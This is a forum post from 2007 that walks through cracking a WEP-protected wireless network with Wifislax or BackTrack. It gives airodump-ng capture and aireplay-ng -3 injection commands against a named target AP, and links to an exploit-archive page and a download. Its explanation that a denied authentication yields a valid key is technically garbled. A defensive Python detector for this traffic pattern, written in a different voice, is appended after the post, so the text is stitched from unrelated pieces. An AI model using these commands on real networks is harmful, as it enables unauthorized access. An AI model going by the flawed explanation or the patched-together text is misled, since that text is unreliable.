Fake Wep

Started by Komtec1, November 21, 2007, 09:50:15 PM


Komtec1

Well, here is another method to crack wireless networks; it's the method I used with Wifislax. Here I do it with BackTrack and two wireless network cards :-D and it's ready to download :P Here it looks a bit better and is better explained...

Also, here is the milw0rm link

http://milw0rm.com/author/1068

http://www.mediafire.com/?cdj5gwtl8bw

Here I leave the explanation. I found this method myself; if I hadn't, it wouldn't be on milw0rm :-)


Faking Wep With Wifislax

How To

Well, the fundamentals of this method are these:

When you make a request to an AP, it sends back a response to tell you whether the authentication
was successful or denied. At that point you need to have a valid transmission with the AP;
this is what this paper is based on. Let's see it...



          First, in Wifislax the rtap0 interface is implemented; for that reason you can use rtap0 to
          replay packets while your card's eth0 is still free. That's the first point.

           ______________
          |              |
          | WirelessCard |  ________ eth0
          |______________|         |
                                   |
                                   |_____ rtap0

          Well, at this point we first start capturing with airodump on the rtap0 interface; after
          that we send a request to the access point with any WEP key, but now with the eth0
          interface.

           ______________
          |              |
          | WirelessCard |  ________ eth0 -------------------- iwconfig eth0 essid targetname key anywepkey
          |______________|         |
                                   |
                                   |_____ rtap0 ----------------- airodump-ng -w anyname rtap0


          OK, we can see in the next diagram that the response was denied, but in that transmission
          the valid key was generated to tell eth0 that the key wasn't valid. That's the point
          we wanted.
       
           ______________
          |              |
          | WirelessCard |  ________ eth0 -------------------- eth0 ----request------ AP ----response denied------ eth0
          |______________|         |
                                   |
                                   |_____ rtap0 ----------------- airodump-ng -w anyname rtap0


        At this point we have one valid request between the AP and the wireless card, and we can start
        injecting packets.
       
           ______________
          |              |
          | WirelessCard |  ________ eth0 -------------------- eth0 denied with a valid key
          |______________|         |
                                   |
                                   |_____ rtap0 ----------------- airodump-ng -w anyname rtap0
                                                                  aireplay-ng -3 -b mac -h mac rtap0 eth0

         Well, after this step you know what the next part is....


Metasploit Doesn't Pwn Systems, Black Hats Pwn
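The pattern the post relies on (the AP denies an authentication, yet the same station keeps transmitting data frames that get replayed) is also what a wireless IDS can look for. The following is an added detection example written for this thread; it is not the poster's code and not part of any tool named above. It assumes a simplified, constructed event format (time, kind, station MAC, 802.11 status code) rather than a real capture, and the window and threshold values are arbitrary choices for illustration.

```python
from collections import defaultdict

# 802.11 authentication response status 0 means success; any other value is a denial.
STATUS_SUCCESS = 0


def build_sample_events():
    """Constructed sample events (not a real capture) in the form
    (time_seconds, kind, station_mac, status_code).
    kind is "auth_resp" (status_code set) or "data" (status_code None)."""
    events = []
    # Station A: authentication denied, then a burst of data frames (replay-like behaviour).
    events.append((0.0, "auth_resp", "00:11:22:33:44:55", 13))
    for i in range(60):
        events.append((0.1 + i * 0.05, "data", "00:11:22:33:44:55", None))
    # Station B: authentication succeeded, then normal traffic; must not be flagged.
    events.append((1.0, "auth_resp", "66:77:88:99:aa:bb", STATUS_SUCCESS))
    for i in range(60):
        events.append((1.1 + i * 0.05, "data", "66:77:88:99:aa:bb", None))
    # Station C: denied once, only a few stray frames; stays below the threshold.
    events.append((5.0, "auth_resp", "cc:dd:ee:ff:00:11", 1))
    for i in range(3):
        events.append((5.2 + i * 0.5, "data", "cc:dd:ee:ff:00:11", None))
    return events


def detect_data_after_denied_auth(events, window=10.0, threshold=50):
    """Return the stations that send at least `threshold` data frames within
    `window` seconds after the AP denied their authentication.

    A later successful authentication clears the station's denied state, so
    ordinary clients that retry and succeed are not reported."""
    denied_at = {}                 # station -> time of the last denial
    data_count = defaultdict(int)  # station -> data frames seen since that denial
    alerts = []
    for t, kind, sta, status in sorted(events, key=lambda e: e[0]):
        if kind == "auth_resp":
            if status != STATUS_SUCCESS:
                denied_at[sta] = t
                data_count[sta] = 0
            else:
                denied_at.pop(sta, None)
        elif kind == "data" and sta in denied_at:
            if t - denied_at[sta] <= window:
                data_count[sta] += 1
                if data_count[sta] == threshold:  # report each station once
                    alerts.append(sta)
    return alerts


if __name__ == "__main__":
    for sta in detect_data_after_denied_auth(build_sample_events()):
        print("suspicious: data frames after denied authentication from", sta)
```

The rule deliberately keys on the AP's own authentication status code rather than on frame sizes, so it works on monitor-mode captures where only management and data headers are visible; in a real deployment the threshold should be tuned against the site's normal retry rate.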